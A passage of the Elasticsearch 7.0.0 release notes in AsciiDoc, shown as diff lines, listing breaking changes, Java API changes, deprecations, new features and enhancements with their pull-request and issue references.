created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - - -[[breaking-7.0.0]] -[discrete] -=== Breaking changes - -Aggregations:: -* Remove support for deprecated params._agg/_aggs for scripted metric aggregations {es-pull}32979[#32979] (issues: {es-issue}29328[#29328], {es-issue}31597[#31597]) -* Percentile/Ranks should return null instead of NaN when empty {es-pull}30460[#30460] (issue: {es-issue}29066[#29066]) -* Render sum as zero if count is zero for stats aggregation {es-pull}27193[#27193] (issue: {es-issue}26893[#26893]) - -Analysis:: -* Remove `delimited_payload_filter` {es-pull}27705[#27705] (issues: {es-issue}26625[#26625], {es-issue}27704[#27704]) -* Limit the number of tokens produced by _analyze {es-pull}27529[#27529] (issue: {es-issue}27038[#27038]) -* Add limits for ngram and shingle settings {es-pull}27211[#27211] (issue: {es-issue}25887[#25887]) - -Audit:: -* Logfile auditing settings remove after deprecation {es-pull}35205[#35205] -* Remove index audit output type {es-pull}37707[#37707] (issues: {es-issue}29881[#29881], {es-issue}37301[#37301]) - -Authentication:: -* Security: remove wrapping in put user response {es-pull}33512[#33512] (issue: {es-issue}32332[#32332]) -* Remove bwc logic for token invalidation {es-pull}36893[#36893] (issue: {es-issue}36727[#36727]) - -Authorization:: -* Remove aliases resolution limitations when security is enabled {es-pull}31952[#31952] (issue: {es-issue}31516[#31516]) -* Remove implicit index monitor privilege {es-pull}37774[#37774] - -Circuit Breakers:: -* Lower fielddata circuit breaker's default limit {es-pull}27162[#27162] (issue: {es-issue}27130[#27130]) - -CRUD:: -* Version conflict exception message enhancement {es-pull}29432[#29432] (issue: {es-issue}21278[#21278]) -* Using ObjectParser in UpdateRequest {es-pull}29293[#29293] (issue: {es-issue}28740[#28740]) -* Remove support for internal versioning for concurrency control {es-pull}38254[#38254] (issue: {es-issue}1078[#1078]) - -Distributed:: -* Remove undocumented action.master.force_local setting {es-pull}29351[#29351] -* Remove tribe node support {es-pull}28443[#28443] -* Forbid negative values for index.unassigned.node_left.delayed_timeout {es-pull}26828[#26828] -* Remove cluster state size {es-pull}40061[#40061] (issues: {es-issue}39806[#39806], {es-issue}39827[#39827], {es-issue}39951[#39951], {es-issue}40016[#40016]) - -Features/Features:: -* Remove Migration Upgrade and Assistance APIs {es-pull}40075[#40075] (issue: {es-issue}40014[#40014]) - -Features/Indices APIs:: -* Indices Exists API should return 404 for empty wildcards {es-pull}34499[#34499] -* Default to one shard {es-pull}30539[#30539] -* Limit the number of nested documents {es-pull}27405[#27405] (issue: {es-issue}26962[#26962]) - -Features/Ingest:: -* Add Configuration Except. Data to Metdata {es-pull}32322[#32322] (issue: {es-issue}27728[#27728]) -* Add ECS schema for user-agent ingest processor (#37727) {es-pull}37984[#37984] (issues: {es-issue}37329[#37329], {es-issue}37727[#37727]) -* Remove special handling for ingest plugins {es-pull}36967[#36967] (issues: {es-issue}36898[#36898], {es-issue}36956[#36956]) - -Features/Java Low Level REST Client:: -* Drop support for the low-level REST client on JDK 7 {es-pull}38540[#38540] (issue: {es-issue}29607[#29607]) - -Features/Watcher:: -* Remove Watcher Account "unsecure" settings {es-pull}36736[#36736] (issue: {es-issue}36403[#36403]) - -Features/Stats:: -* Remove the suggest metric from stats APIs {es-pull}29635[#29635] (issue: {es-issue}29589[#29589]) -* Align cat thread pool info to thread pool config {es-pull}29195[#29195] (issue: {es-issue}29123[#29123]) -* Align thread pool info to thread pool configuration {es-pull}29123[#29123] (issue: {es-issue}29113[#29113]) - -Geo:: -* Use geohash cell instead of just a corner in geo_bounding_box {es-pull}30698[#30698] (issue: {es-issue}25154[#25154]) - -Index APIs:: -* Always enforce cluster-wide shard limit {es-pull}34892[#34892] (issues: {es-issue}20705[#20705], {es-issue}34021[#34021]) - -Infra/Circuit Breakers:: -* Introduce durability of circuit breaking exception {es-pull}34460[#34460] (issue: {es-issue}31986[#31986]) -* Circuit-break based on real memory usage {es-pull}31767[#31767] - -Infra/Core:: -* Default node.name to the hostname {es-pull}33677[#33677] -* Remove bulk fallback for write thread pool {es-pull}29609[#29609] -* CCS: Drop http address from remote cluster info {es-pull}29568[#29568] (issue: {es-issue}29207[#29207]) -* Remove the index thread pool {es-pull}29556[#29556] -* Main response should not have status 503 when okay {es-pull}29045[#29045] (issue: {es-issue}8902[#8902]) -* Automatically prepare indices for splitting {es-pull}27451[#27451] -* Don't refresh on `_flush` `_force_merge` and `_upgrade` {es-pull}27000[#27000] (issue: {es-issue}26972[#26972]) - -Infra/Logging:: -* Elasticsearch json logging {es-pull}36833[#36833] (issue: {es-issue}32850[#32850]) - -Infra/Packaging:: -* Packaging: Remove windows bin files from the tar distribution {es-pull}30596[#30596] -* Package ingest-user-agent as a module {es-pull}36956[#36956] -* Package ingest-geoip as a module {es-pull}36898[#36898] - -Infra/REST API:: -* Remove GET support for clear cache indices {es-pull}29525[#29525] -* Clear Indices Cache API remove deprecated url params {es-pull}29068[#29068] - -Infra/Scripting:: -* Remove support for deprecated StoredScript contexts {es-pull}31394[#31394] (issues: {es-issue}27612[#27612], {es-issue}28939[#28939]) -* Remove getDate methods from ScriptDocValues {es-pull}30690[#30690] -* Drop `ScriptDocValues#date` and `ScriptDocValues#dates` in 7.0.0 {es-pull}30690[#30690] (issue: {es-issue}23008[#23008]) - -Infra/Settings:: -* Remove config prompting for secrets and text {es-pull}27216[#27216] - -Machine Learning:: -* Remove types from datafeed {es-pull}36538[#36538] (issue: {es-issue}34265[#34265]) - -Mapping:: -* Match phrase queries against non-indexed fields should throw an exception {es-pull}31060[#31060] -* Remove legacy mapping code. {es-pull}29224[#29224] -* Reject updates to the `_default_` mapping. {es-pull}29165[#29165] (issues: {es-issue}15613[#15613], {es-issue}28248[#28248]) -* Remove the `update_all_types` option. {es-pull}28288[#28288] -* Remove the `_default_` mapping. {es-pull}28248[#28248] -* Reject the `index_options` parameter for numeric fields {es-pull}26668[#26668] (issue: {es-issue}21475[#21475]) -* Update the default for include_type_name to false. {es-pull}37285[#37285] -* Support 'include_type_name' in RestGetIndicesAction {es-pull}37149[#37149] - -Network:: -* Remove http.enabled setting {es-pull}29601[#29601] (issue: {es-issue}12792[#12792]) -* Remove HTTP max content length leniency {es-pull}29337[#29337] -* Remove TLS 1.0 as a default SSL protocol {es-pull}37512[#37512] (issue: {es-issue}36021[#36021]) -* Security: remove SSL settings fallback {es-pull}36846[#36846] (issue: {es-issue}29797[#29797]) - -Percolator:: -* Remove deprecated percolator map_unmapped_fields_as_string setting {es-pull}28060[#28060] - -Ranking:: -* Add minimal sanity checks to custom/scripted similarities. {es-pull}33564[#33564] (issue: {es-issue}33309[#33309]) -* Scroll queries asking for rescore are considered invalid {es-pull}32918[#32918] (issue: {es-issue}31775[#31775]) -* Forbid negative scores in function_score query {es-pull}35709[#35709] (issue: {es-issue}33309[#33309]) -* Forbid negative field boosts in analyzed queries {es-pull}37930[#37930] (issue: {es-issue}33309[#33309]) - -Scripting:: -* Delete deprecated getValues from ScriptDocValues {es-pull}36183[#36183] (issue: {es-issue}22919[#22919]) - -Search:: -* Remove deprecated url parameters `_source_include` and `_source_exclude` {es-pull}35097[#35097] (issues: {es-issue}22792[#22792], {es-issue}33475[#33475]) -* Disallow negative query boost {es-pull}34486[#34486] (issue: {es-issue}33309[#33309]) -* Forbid negative `weight` in Function Score Query {es-pull}33390[#33390] (issue: {es-issue}31927[#31927]) -* In the field capabilities API, remove support for providing fields in the request body. {es-pull}30185[#30185] -* Remove deprecated options for query_string {es-pull}29203[#29203] (issue: {es-issue}25551[#25551]) -* Fix Laplace scorer to multiply by alpha (and not add) {es-pull}27125[#27125] -* Remove _primary and _replica shard preferences {es-pull}26791[#26791] (issue: {es-issue}26335[#26335]) -* Limit the number of expanded fields it query_string and simple_query_string {es-pull}26541[#26541] (issue: {es-issue}25105[#25105]) -* Make purely negative queries return scores of 0. {es-pull}26015[#26015] (issue: {es-issue}23449[#23449]) -* Remove the deprecated _termvector endpoint. {es-pull}36131[#36131] (issues: {es-issue}36098[#36098], {es-issue}8484[#8484]) -* Remove deprecated Graph endpoints {es-pull}35956[#35956] -* Validate metadata on `_msearch` {es-pull}35938[#35938] (issue: {es-issue}35869[#35869]) -* Make hits.total an object in the search response {es-pull}35849[#35849] (issue: {es-issue}33028[#33028]) -* Remove the distinction between query and filter context in QueryBuilders {es-pull}35354[#35354] (issue: {es-issue}35293[#35293]) -* Throw a parsing exception when boost is set in span_or query (#28390) {es-pull}34112[#34112] (issue: {es-issue}28390[#28390]) -* Track total hits up to 10,000 by default {es-pull}37466[#37466] (issue: {es-issue}33028[#33028]) -* Use mappings to format doc-value fields by default. {es-pull}30831[#30831] (issues: {es-issue}26948[#26948], {es-issue}29639[#29639]) - -Security:: -* Remove heuristics that enable security on trial licenses {es-pull}38075[#38075] (issue: {es-issue}38009[#38009]) - -Snapshot/Restore:: -* Include size of snapshot in snapshot metadata {es-pull}30890[#30890] (issue: {es-issue}18543[#18543]) -* Remove azure deprecated settings {es-pull}26099[#26099] (issue: {es-issue}23405[#23405]) - -Store:: -* Drop elasticsearch-translog for 7.0 {es-pull}33373[#33373] (issues: {es-issue}31389[#31389], {es-issue}32281[#32281]) -* completely drop `index.shard.check_on_startup: fix` for 7.0 {es-pull}33194[#33194] - -Suggesters:: -* Fix threshold frequency computation in Suggesters {es-pull}34312[#34312] (issue: {es-issue}34282[#34282]) -* Make Geo Context Mapping Parsing More Strict {es-pull}32821[#32821] (issues: {es-issue}32202[#32202], {es-issue}32412[#32412]) -* Remove the ability to index or query context suggestions without context {es-pull}31007[#31007] (issue: {es-issue}30712[#30712]) - -ZenDiscovery:: -* Best-effort cluster formation if unconfigured {es-pull}36215[#36215] -* Remove DiscoveryPlugin#getDiscoveryTypes {es-pull}38414[#38414] (issue: {es-issue}38410[#38410]) - -[[breaking-java-7.0.0]] -[discrete] -=== Breaking Java changes - -Aggregations:: -* Change GeoHashGrid.Bucket#getKey() to return String {es-pull}31748[#31748] (issue: {es-issue}30320[#30320]) - -Analysis:: -* Remove deprecated AnalysisPlugin#requriesAnalysisSettings method {es-pull}32037[#32037] (issue: {es-issue}32025[#32025]) - -Features/Java High Level REST Client:: -* Drop deprecated methods from Retry {es-pull}33925[#33925] -* Cluster health to default to cluster level {es-pull}31268[#31268] (issue: {es-issue}29331[#29331]) -* Remove deprecated API methods {es-pull}31200[#31200] (issue: {es-issue}31069[#31069]) - -Features/Java Low Level REST Client:: -* Drop deprecated methods {es-pull}33223[#33223] (issues: {es-issue}29623[#29623], {es-issue}30315[#30315]) -* Remove support for maxRetryTimeout from low-level REST client {es-pull}38085[#38085] (issues: {es-issue}25951[#25951], {es-issue}31834[#31834], {es-issue}33342[#33342]) - -Geo:: -* Decouple geojson parse logic from ShapeBuilders {es-pull}27212[#27212] - -Infra/Core:: -* Remove RequestBuilder from Action {es-pull}30966[#30966] -* Handle scheduler exceptions {es-pull}38014[#38014] (issues: {es-issue}28667[#28667], {es-issue}36137[#36137], {es-issue}37708[#37708]) - -Infra/Transport API:: -* Java api clean up: remove deprecated `isShardsAcked` {es-pull}28311[#28311] (issues: {es-issue}27784[#27784], {es-issue}27819[#27819]) - -ZenDiscovery:: -* Make node field in JoinRequest private {es-pull}36405[#36405] - -[[deprecation-7.0.0]] -[discrete] -=== Deprecations - -Aggregations:: -* Deprecate dots in aggregation names {es-pull}31468[#31468] (issues: {es-issue}17600[#17600], {es-issue}19040[#19040]) - -Analysis:: -* Replace parameter unicodeSetFilter with unicode_set_filter {es-pull}29215[#29215] (issue: {es-issue}22823[#22823]) -* Replace delimited_payload_filter by delimited_payload {es-pull}26625[#26625] (issue: {es-issue}21978[#21978]) -* Deprecate Standard Html Strip Analyzer in master {es-pull}26719[#26719] (issue: {es-issue}4704[#4704]) -* Remove `nGram` and `edgeNGram` token filter names (#38911) {es-pull}39070[#39070] (issues: {es-issue}30209[#30209], {es-issue}38911[#38911]) - -Audit:: -* Deprecate index audit output type {es-pull}37301[#37301] (issue: {es-issue}29881[#29881]) - -Core:: -* Deprecate use of scientific notation in epoch time parsing {es-pull}36691[#36691] -* Add backcompat for joda time formats {es-pull}36531[#36531] - -Cluster Coordination:: -* Deprecate size in cluster state response {es-pull}39951[#39951] (issue: {es-issue}39806[#39806]) - -Features/Indices APIs:: -* Default copy settings to true and deprecate on the REST layer {es-pull}30598[#30598] -* Reject setting index.optimize_auto_generated_id after version 7.0.0 {es-pull}28895[#28895] (issue: {es-issue}27600[#27600]) - -Features/Ingest:: -* Deprecate `_type` in simulate pipeline requests {es-pull}37949[#37949] (issue: {es-issue}37731[#37731]) - -Features/Java High Level REST Client:: -* Deprecate HLRC security methods {es-pull}37883[#37883] (issues: {es-issue}36938[#36938], {es-issue}37540[#37540]) -* Deprecate HLRC EmptyResponse used by security {es-pull}37540[#37540] (issue: {es-issue}36938[#36938]) - -Features/Watcher:: -* Deprecate xpack.watcher.history.cleaner_service.enabled {es-pull}37782[#37782] (issue: {es-issue}32041[#32041]) -* deprecate types for watcher {es-pull}37594[#37594] (issue: {es-issue}35190[#35190]) - -Graph:: -* Deprecate types in `_graph/explore` calls. {es-pull}40466[#40466] - -Infra/Core:: -* Deprecate negative epoch timestamps {es-pull}36793[#36793] -* Deprecate use of scientific notation in epoch time parsing {es-pull}36691[#36691] - -Infra/Packaging:: -* Deprecate fallback to java on PATH {es-pull}37990[#37990] - -Infra/Scripting:: -* Add types deprecation to script contexts {es-pull}37554[#37554] -* Deprecate _type from LeafDocLookup {es-pull}37491[#37491] -* Remove deprecated params.ctx {es-pull}36848[#36848] (issue: {es-issue}34059[#34059]) - -Infra/Transport API:: -* Deprecate the transport client in favour of the high-level REST client {es-pull}27085[#27085] - -Machine Learning:: -* Deprecate X-Pack centric ML endpoints {es-pull}36315[#36315] (issue: {es-issue}35958[#35958]) -* Adding ml_settings entry to HLRC and Docs for deprecation_info {es-pull}38118[#38118] -* Datafeed deprecation checks {es-pull}38026[#38026] (issue: {es-issue}37932[#37932]) -* Remove "8" prefixes from file structure finder timestamp formats {es-pull}38016[#38016] -* Adjust structure finder for Joda to Java time migration {es-pull}37306[#37306] -* Resolve 7.0.0 TODOs in ML code {es-pull}36842[#36842] (issue: {es-issue}29963[#29963]) - -Mapping:: -* Deprecate type exists requests. {es-pull}34663[#34663] -* Deprecate types in index API {es-pull}36575[#36575] (issues: {es-issue}35190[#35190], {es-issue}35790[#35790]) -* Deprecate uses of _type as a field name in queries {es-pull}36503[#36503] (issue: {es-issue}35190[#35190]) -* Deprecate types in update_by_query and delete_by_query {es-pull}36365[#36365] (issue: {es-issue}35190[#35190]) -* For msearch templates, make sure to use the right name for deprecation logging. {es-pull}36344[#36344] -* Deprecate types in termvector and mtermvector requests. {es-pull}36182[#36182] -* Deprecate types in update requests. {es-pull}36181[#36181] -* Deprecate types in document delete requests. {es-pull}36087[#36087] -* Deprecate types in get, exists, and multi get. {es-pull}35930[#35930] -* Deprecate types in search and multi search templates. {es-pull}35669[#35669] -* Deprecate types in explain requests. {es-pull}35611[#35611] -* Deprecate types in validate query requests. {es-pull}35575[#35575] -* Deprecate types in count and msearch. {es-pull}35421[#35421] (issue: {es-issue}34041[#34041]) -* Deprecate types in rollover index API {es-pull}38039[#38039] (issue: {es-issue}35190[#35190]) -* Deprecate types in get field mapping API {es-pull}37667[#37667] (issue: {es-issue}35190[#35190]) -* Deprecate types in the put mapping API. {es-pull}37280[#37280] (issues: {es-issue}29453[#29453], {es-issue}37285[#37285]) -* Support include_type_name in the field mapping and index template APIs. {es-pull}37210[#37210] -* Deprecate types in create index requests. {es-pull}37134[#37134] (issues: {es-issue}29453[#29453], {es-issue}37285[#37285]) -* Deprecate use of the _type field in aggregations. {es-pull}37131[#37131] (issue: {es-issue}36802[#36802]) -* Deprecate reference to _type in lookup queries {es-pull}37016[#37016] (issue: {es-issue}35190[#35190]) -* Deprecate the document create endpoint. {es-pull}36863[#36863] -* Deprecate types in index API {es-pull}36575[#36575] (issues: {es-issue}35190[#35190], {es-issue}35790[#35790]) -* Deprecate types in update APIs {es-pull}36225[#36225] - -Migration:: -* Deprecate X-Pack centric Migration endpoints {es-pull}35976[#35976] (issue: {es-issue}35958[#35958]) - -Monitoring:: -* Deprecate /_xpack/monitoring/* in favor of /_monitoring/* {es-pull}36130[#36130] (issue: {es-issue}35958[#35958]) - -Rollup:: -* Re-deprecate xpack rollup endpoints {es-pull}36451[#36451] (issue: {es-issue}36044[#36044]) -* Deprecate X-Pack centric rollup endpoints {es-pull}35962[#35962] (issue: {es-issue}35958[#35958]) - -Scripting:: -* Adds deprecation logging to ScriptDocValues#getValues. {es-pull}34279[#34279] (issue: {es-issue}22919[#22919]) -* Conditionally use java time api in scripting {es-pull}31441[#31441] - -Search:: -* Deprecate filtering on `_type`. {es-pull}29468[#29468] (issue: {es-issue}15613[#15613]) -* Remove X-Pack centric graph endpoints {es-pull}36010[#36010] (issue: {es-issue}35958[#35958]) -* Deprecate use of type in reindex request body {es-pull}36823[#36823] -* Add typless endpoints for get_source and exist_source {es-pull}36426[#36426] - -Security:: -* Deprecate X-Pack centric license endpoints {es-pull}35959[#35959] (issue: {es-issue}35958[#35958]) -* Deprecate /_xpack/security/* in favor of /_security/* {es-pull}36293[#36293] (issue: {es-issue}35958[#35958]) - -SQL:: -* Deprecate X-Pack SQL translate endpoint {es-pull}36030[#36030] -* Deprecate X-Pack centric SQL endpoints {es-pull}35964[#35964] (issue: {es-issue}35958[#35958]) - -Watcher:: -* Deprecate X-Pack centric watcher endpoints {es-pull}36218[#36218] (issue: {es-issue}35958[#35958]) - - -[[feature-7.0.0]] -[discrete] -=== New features - -Allocation:: -* Node repurpose tool {es-pull}39403[#39403] (issues: {es-issue}37347[#37347], {es-issue}37748[#37748]) - -Analysis:: -* Relax TermVectors API to work with textual fields other than TextFieldType {es-pull}31915[#31915] (issue: {es-issue}31902[#31902]) -* Add support for inlined user dictionary in Nori {es-pull}36123[#36123] (issue: {es-issue}35842[#35842]) -* Add a prebuilt ICU Analyzer {es-pull}34958[#34958] (issue: {es-issue}34285[#34285]) - -Authentication:: -* Add support for API keys to access Elasticsearch {es-pull}38291[#38291] (issue: {es-issue}34383[#34383]) -* OIDC realm authentication flows {es-pull}37787[#37787] -* OIDC Realm JWT+JWS related functionality {es-pull}37272[#37272] (issues: {es-issue}35339[#35339], {es-issue}37009[#37009]) -* OpenID Connect Realm base functionality {es-pull}37009[#37009] (issue: {es-issue}35339[#35339]) - -Authorization:: -* Allow custom authorization with an authorization engine {es-pull}38358[#38358] (issues: {es-issue}32435[#32435], {es-issue}36245[#36245], {es-issue}37328[#37328], {es-issue}37495[#37495], {es-issue}37785[#37785], {es-issue}38137[#38137], {es-issue}38219[#38219]) -* Wildcard IndicesPermissions don't cover .security {es-pull}36765[#36765] - -CCR:: -* Generalize search.remote settings to cluster.remote {es-pull}33413[#33413] -* Add ccr follow info api {es-pull}37408[#37408] (issue: {es-issue}37127[#37127]) - -Distributed:: -* Log messages from allocation commands {es-pull}25955[#25955] (issues: {es-issue}22821[#22821], {es-issue}25325[#25325]) - -Features/ILM:: -* Add unfollow action {es-pull}36970[#36970] (issue: {es-issue}34648[#34648]) - -Features/Ingest:: -* Revert "Introduce a Hashing Processor (#31087)" {es-pull}32178[#32178] -* Add ingest-attachment support for per document `indexed_chars` limit {es-pull}28977[#28977] (issue: {es-issue}28942[#28942]) - -Features/Java High Level REST Client:: -* GraphClient for the high level REST client and associated tests {es-pull}32366[#32366] - -Features/Monitoring:: -* Collect only display_name (for now) {es-pull}35265[#35265] (issue: {es-issue}8445[#8445]) - -Geo:: -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}36751[#36751] (issue: {es-issue}35320[#35320]) -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}35320[#35320] (issue: {es-issue}32039[#32039]) -* geotile_grid implementation {es-pull}37842[#37842] (issue: {es-issue}30240[#30240]) -* Fork Lucene's LatLonShape Classes to local lucene package {es-pull}36794[#36794] -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}36751[#36751] (issue: {es-issue}35320[#35320]) -* Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}35320[#35320] (issue: {es-issue}32039[#32039]) - -Infra/Core:: -* Skip shard refreshes if shard is `search idle` {es-pull}27500[#27500] - -Infra/Logging:: -* Logging: Unify log rotation for index/search slow log {es-pull}27298[#27298] - -Infra/Plugins:: -* Reload secure settings for plugins {es-pull}31383[#31383] (issue: {es-issue}29135[#29135]) - -Infra/REST API:: -* Add an `include_type_name` option. {es-pull}29453[#29453] (issue: {es-issue}15613[#15613]) - -Java High Level REST Client:: -* Add rollup search {es-pull}36334[#36334] (issue: {es-issue}29827[#29827]) - -Java Low Level REST Client:: -* Make warning behavior pluggable per request {es-pull}36345[#36345] -* Add PreferHasAttributeNodeSelector {es-pull}36005[#36005] - -Machine Learning:: -* Filter undefined job groups from update job calendar actions {es-pull}30757[#30757] -* Add delayed datacheck to the datafeed job runner {es-pull}35387[#35387] (issue: {es-issue}35131[#35131]) -* Adds set_upgrade_mode API endpoint {es-pull}37837[#37837] - -Mapping:: -* Add a `feature_vector` field. {es-pull}31102[#31102] (issue: {es-issue}27552[#27552]) -* Expose Lucene's FeatureField. {es-pull}30618[#30618] -* Make typeless APIs usable with indices whose type name is different from `_doc` {es-pull}35790[#35790] (issue: {es-issue}35190[#35190]) -* Give precedence to index creation when mixing typed templates with typeless index creation and vice-versa. {es-pull}37871[#37871] (issue: {es-issue}37773[#37773]) -* Add nanosecond field mapper {es-pull}37755[#37755] (issues: {es-issue}27330[#27330], {es-issue}32601[#32601]) - -Ranking:: -* Add ranking evaluation API {es-pull}27478[#27478] (issue: {es-issue}19195[#19195]) - -Recovery:: -* Allow to trim all ops above a certain seq# with a term lower than X, … {es-pull}31211[#31211] (issue: {es-issue}10708[#10708]) - -SQL:: -* Add basic support for ST_AsWKT geo function {es-pull}34205[#34205] -* Add support for SYS GEOMETRY_COLUMNS {es-pull}30496[#30496] (issue: {es-issue}29872[#29872]) -* Introduce HISTOGRAM grouping function {es-pull}36510[#36510] (issue: {es-issue}36509[#36509]) -* DATABASE() and USER() system functions {es-pull}35946[#35946] (issue: {es-issue}35863[#35863]) -* Introduce INTERVAL support {es-pull}35521[#35521] (issue: {es-issue}29990[#29990]) -* Allow sorting of groups by aggregates {es-pull}38042[#38042] (issue: {es-issue}35118[#35118]) -* Implement FIRST/LAST aggregate functions {es-pull}37936[#37936] (issue: {es-issue}35639[#35639]) -* Introduce SQL DATE data type {es-pull}37693[#37693] (issue: {es-issue}37340[#37340]) - -Search:: -* Add “took” timing info to response for _msearch/template API {es-pull}30961[#30961] (issue: {es-issue}30957[#30957]) -* Add allow_partial_search_results flag to search requests with default setting true {es-pull}28440[#28440] (issue: {es-issue}27435[#27435]) -* Enable adaptive replica selection by default {es-pull}26522[#26522] (issue: {es-issue}24915[#24915]) -* Add intervals query {es-pull}36135[#36135] (issues: {es-issue}29636[#29636], {es-issue}32406[#32406]) -* Added soft limit to open scroll contexts #25244 {es-pull}36009[#36009] (issue: {es-issue}25244[#25244]) -* Introduce ability to minimize round-trips in CCS {es-pull}37828[#37828] (issues: {es-issue}32125[#32125], {es-issue}37566[#37566]) -* Add script filter to intervals {es-pull}36776[#36776] -* Add the ability to set the number of hits to track accurately {es-pull}36357[#36357] (issue: {es-issue}33028[#33028]) -* Add a maximum search request size. {es-pull}26423[#26423] -* Make IntervalQuery available via the Query DSL {es-pull}36135[#36135] (issue: {es-issue}29636[#29636]) - -Security:: -* Switch internal security index to ".security-7" {es-pull}39337[#39337] (issue: {es-issue}39284[#39284]) - -Suggesters:: -* Serialize suggestion responses as named writeables {es-pull}30284[#30284] (issue: {es-issue}26585[#26585]) - - -[[enhancement-7.0.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Uses MergingDigest instead of AVLDigest in percentiles agg {es-pull}28702[#28702] (issue: {es-issue}19528[#19528]) -* Added keyed response to pipeline percentile aggregations 22302 {es-pull}36392[#36392] (issue: {es-issue}22302[#22302]) -* Enforce max_buckets limit only in the final reduction phase {es-pull}36152[#36152] (issues: {es-issue}32125[#32125], {es-issue}35921[#35921]) -* Histogram aggs: add empty buckets only in the final reduce step {es-pull}35921[#35921] -* Handles exists query in composite aggs {es-pull}35758[#35758] -* Added parent validation for auto date histogram {es-pull}35670[#35670] -* Add Composite to AggregationBuilders {es-pull}38207[#38207] (issue: {es-issue}38020[#38020]) -* Allow nested fields in the composite aggregation {es-pull}37178[#37178] (issue: {es-issue}28611[#28611]) -* Remove single shard optimization when suggesting shard_size {es-pull}37041[#37041] (issue: {es-issue}32125[#32125]) -* Use List instead of priority queue for stable sorting in bucket sort aggregator {es-pull}36748[#36748] (issue: {es-issue}36322[#36322]) -* Keys are compared in BucketSortPipelineAggregation so making key type… {es-pull}36407[#36407] - -Allocation:: -* Fail start on obsolete indices documentation {es-pull}37786[#37786] (issue: {es-issue}27073[#27073]) -* Fail start on invalid index metadata {es-pull}37748[#37748] (issue: {es-issue}27073[#27073]) -* Fail start of non-data node if node has data {es-pull}37347[#37347] (issue: {es-issue}27073[#27073]) - -Analysis:: -* Allow word_delimiter_graph_filter to not adjust internal offsets {es-pull}36699[#36699] (issues: {es-issue}33710[#33710], {es-issue}34741[#34741]) -* Ensure TokenFilters only produce single tokens when parsing synonyms {es-pull}34331[#34331] (issue: {es-issue}34298[#34298]) -* Allow word_delimiter_graph_filter to not adjust internal offsets {es-pull}36699[#36699] (issues: {es-issue}33710[#33710], {es-issue}34741[#34741]) - -Audit:: -* Add "request.id" to file audit logs {es-pull}35536[#35536] -* Security Audit includes HTTP method for requests {es-pull}37322[#37322] (issue: {es-issue}29765[#29765]) -* Add X-Forwarded-For to the logfile audit {es-pull}36427[#36427] - -Authentication:: -* Invalidate Token API enhancements - HLRC {es-pull}36362[#36362] (issue: {es-issue}35388[#35388]) -* Add DEBUG/TRACE logs for LDAP bind {es-pull}36028[#36028] -* Add Tests for findSamlRealm {es-pull}35905[#35905] -* Add realm information for Authenticate API {es-pull}35648[#35648] -* Formal support for "password_hash" in Put User {es-pull}35242[#35242] (issue: {es-issue}34729[#34729]) -* Propagate auth result to listeners {es-pull}36900[#36900] (issue: {es-issue}30794[#30794]) -* Reorder realms based on last success {es-pull}36878[#36878] -* Improve error message for 6.x style realm settings {es-pull}36876[#36876] (issues: {es-issue}30241[#30241], {es-issue}36026[#36026]) -* Change missing authn message to not mention tokens {es-pull}36750[#36750] -* Invalidate Token API enhancements - HLRC {es-pull}36362[#36362] (issue: {es-issue}35388[#35388]) -* Enhance Invalidate Token API {es-pull}35388[#35388] (issues: {es-issue}34556[#34556], {es-issue}35115[#35115]) - -Authorization:: -* Improve exact index matching performance {es-pull}36017[#36017] -* `manage_token` privilege for `kibana_system` {es-pull}35751[#35751] -* Grant .tasks access to kibana_system role {es-pull}35573[#35573] -* Add apm_user reserved role {es-pull}38206[#38206] -* Permission for restricted indices {es-pull}37577[#37577] (issue: {es-issue}34454[#34454]) -* Remove kibana_user and kibana_dashboard_only_user index privileges {es-pull}37441[#37441] -* Create snapshot role {es-pull}35820[#35820] (issue: {es-issue}34454[#34454]) - -Build:: -* Sounds like typo in exception message {es-pull}35458[#35458] -* Allow set section in setup section of REST tests {es-pull}34678[#34678] - -CCR:: -* Add time since last auto follow fetch to auto follow stats {es-pull}36542[#36542] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Clean followed leader index UUIDs in auto follow metadata {es-pull}36408[#36408] (issue: {es-issue}33007[#33007]) -* Change AutofollowCoordinator to use wait_for_metadata_version {es-pull}36264[#36264] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Refactor AutoFollowCoordinator to track leader indices per remote cluster {es-pull}36031[#36031] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Concurrent file chunk fetching for CCR restore {es-pull}38495[#38495] -* Tighten mapping syncing in ccr remote restore {es-pull}38071[#38071] (issues: {es-issue}36879[#36879], {es-issue}37887[#37887]) -* Do not allow put mapping on follower {es-pull}37675[#37675] (issue: {es-issue}30086[#30086]) -* Added ccr to xpack usage infrastructure {es-pull}37256[#37256] (issue: {es-issue}37221[#37221]) -* FollowingEngine should fail with 403 if operation has no seqno assigned {es-pull}37213[#37213] -* Added auto_follow_exception.timestamp field to auto follow stats {es-pull}36947[#36947] -* Add time since last auto follow fetch to auto follow stats {es-pull}36542[#36542] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) -* Reduce retention lease sync intervals {es-pull}40302[#40302] -* Renew retention leases while following {es-pull}39335[#39335] (issues: {es-issue}37165[#37165], {es-issue}38718[#38718]) -* Reduce refresh when lookup term in FollowingEngine {es-pull}39184[#39184] -* Integrate retention leases to recovery from remote {es-pull}38829[#38829] (issue: {es-issue}37165[#37165]) -* Enable removal of retention leases {es-pull}38751[#38751] (issue: {es-issue}37165[#37165]) -* Introduce forget follower API {es-pull}39718[#39718] (issue: {es-issue}37165[#37165]) - -Client:: -* Fixed required fields and paths list {es-pull}39358[#39358] - -Cluster Coordination:: -* Remove timeout task after completing cluster state publication {es-pull}40411[#40411] -* Use default discovery implementation for single-node discovery {es-pull}40036[#40036] -* Do not log unsuccessful join attempt each time {es-pull}39756[#39756] - -Core:: -* Override the JVM DNS cache policy {es-pull}36570[#36570] -* Replace usages of AtomicBoolean based block of code by the RunOnce class {es-pull}35553[#35553] (issue: {es-issue}35489[#35489]) -* Added wait_for_metadata_version parameter to cluster state api. 